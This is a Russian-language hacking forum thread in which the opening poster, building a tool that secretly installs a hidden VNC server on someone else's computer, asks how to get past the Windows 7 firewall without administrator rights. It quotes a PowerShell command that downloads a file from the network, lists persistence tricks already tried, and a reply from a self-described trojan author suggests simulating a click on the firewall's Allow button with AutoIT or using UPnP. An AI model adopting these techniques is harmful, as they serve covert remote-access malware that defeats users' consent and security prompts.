Основан 26 Июля 2013 года
freehacks.ru fhacks.me fhacks.pw fhacksnplmzxaaoo.onion
HashFlare
Показано с 1 по 3 из 3
    TopicStarter

Статус
    Безопасность

Обход брандмауэра Windows

Здравствуйте все.
    Есть добрые люди, знающие как без прав администратора обойти брандмауэр Windows 7? Подскажите хотя бы направление в котором копать)

За подробностями под спойлер:

Скрытый текст

Пишу маленькую утилиту, устанавливающую скрытый VNC сервер на удаленный компьютер. Старо, банально, но ничего лучшего придумать не смог. Да и не палится UltraVnc в отличие от ближайших аналогов.
    Собрал, скомпилировал - работает. С одной маленькой, но неприятной особенностью: при первом запуске требует разрешение на доступ к сети. Надеяться что пользователь дурак не мой случай, по условию задачи сидит под обычным пользователем с настройками Windows по умолчанию (все включено, UAC не ниже среднего).
    Последняя Windows 8.1 позволяет скачивать файл в обход всех защит простой командой:
    powershell -command "& { iwr [Только зарегистрированные могут видеть это. ] -OutFile FILE }"
    Неужели нет ничего аналогичного для моего случая?
    Пробовал такие безнадежные способы как выполнение команд батником, создание задачи в планировщике, правку реестра, создание скрытого пользователя и WMI.
    [свернуть]

Заблокирован по собственному желанию

Статус
    Безопасность
    Когда я писал свой первый троян, встал такой же вопрос.
    Решилось это банально, поиск окна брандмауэра и эмуляция нажатия кнопку разрешить.
    Давно это было, но метод работал. Не знаю, как сейчас там дела обстоят, и прокатит ли этот способ, но попробовать можно. Эмулировал и искал при помощи AutoIT.
    Ну или рой в сторону: UPnP.
    Последний раз редактировалось DeNZeL; 01.12.2014 в 11:48.

Статус
    Программист
    сейчас ещё добавилось подтверждение запуска файла скаченного с интернета
    и это не брандмауэр или уак
    это вроде сам эксплорер, так что только эмуляция
    8AC4F56356469F79B5283364053ACDA49D8EC9FEFDADC2B42F A5B4E979D9222267583F350BF9

с/delphi/pascal/vbs/vbm/bat
    Ник зареган, суки! [Только зарегистрированные могут видеть это. ]

Метки этой темы

Ваши права